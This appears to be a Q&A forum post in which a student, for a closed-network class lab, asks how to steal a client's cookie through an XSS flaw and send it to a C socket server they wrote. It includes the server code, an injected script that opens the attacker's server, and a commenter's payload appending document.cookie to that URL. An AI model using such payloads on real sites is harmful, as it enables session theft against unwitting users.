# How can I get my XSS script to properly talk to my C server?

Tags: c, cookies, server, xss

For a class assignment, I am told to use a xss attack to steal a cookie. We are given a VM to work on and a client from which to steal the cookie. We have the ability to use telnet to make the client go to any url we want, but are unable to view directly what happens. We were given a website that is on another server that is vulnerable. Since the network is closed and the client is only able to visit sites hosted by either the provided server or my VM, my professor suggested that I write a simple C server, have it listen on a specific port, and send the cookie through to allow my server to print it.

Here is the server I am using. It is listening on port 8888.

```
#include<stdio.h>
#include<string.h>    //strlen
#include<sys/socket.h>
#include<arpa/inet.h> //inet_addr
#include<unistd.h>    //write

int main(int argc , char *argv[])
{
int socket_desc , client_sock , c , read_size;
struct sockaddr_in server , client;
char client_message[2000];

//Create socket
socket_desc = socket(AF_INET , SOCK_STREAM , 0);
if (socket_desc == -1)
{
    printf("Could not create socket");
}
puts("Socket created");

//Prepare the sockaddr_in structure
server.sin_family = AF_INET;
server.sin_addr.s_addr = INADDR_ANY;
server.sin_port = htons( 8888 );

//Bind
if( bind(socket_desc,(struct sockaddr *)&server , sizeof(server)) < 0)
{
    //print the error message
    perror("bind failed. Error");
    return 1;
}
puts("bind done");

//Listen
listen(socket_desc , 3);

//Accept and incoming connection
puts("Waiting for incoming connections...");
c = sizeof(struct sockaddr_in);

//accept connection from an incoming client
client_sock = accept(socket_desc, (struct sockaddr *)&client, (socklen_t*)&c);
if (client_sock < 0)
{
    perror("accept failed");
    return 1;
}
puts("Connection accepted");

//Receive a message from client
while( (read_size = recv(client_sock , client_message , 2000 , 0)) > 0 )
{
    //Send the message back to client
    //write(client_sock , client_message , strlen(client_message));
    printf("%s \n",client_message);
}

if(read_size == 0)
{
    puts("Client disconnected");
    fflush(stdout);
}
else if(read_size == -1)
{
    perror("recv failed");
}

return 0;
}
```

I have gotten to where I can use an XSS attack to get connected to my server, but do not know how to send across the cookie. I know it is stored in `document.cookie`. Trying `...WEBSITEURL...?user="><script>window.open("http://localhost:8888")</script>` with the url of the vulnerable site establishes a connection to my server (my server says so), but I do not know what to do from here.Do I need to modify my server in some way to accept a certain kind of input? I have tried `..localhost:8888?test"` and I get a 404 error.

IN SHORT: How can I use a xss attack to send a cookie to a C server?

Comment: You need a slash after the host name. Try `<script>window.open("http://localhost:8888/?c="+escape(document.cookie))</script>`

Comment: Well i just tried that and it didn't even seem to connect to my server that time. That looks similar to what I saw you should do when you are sending to a php page, which I am not doing.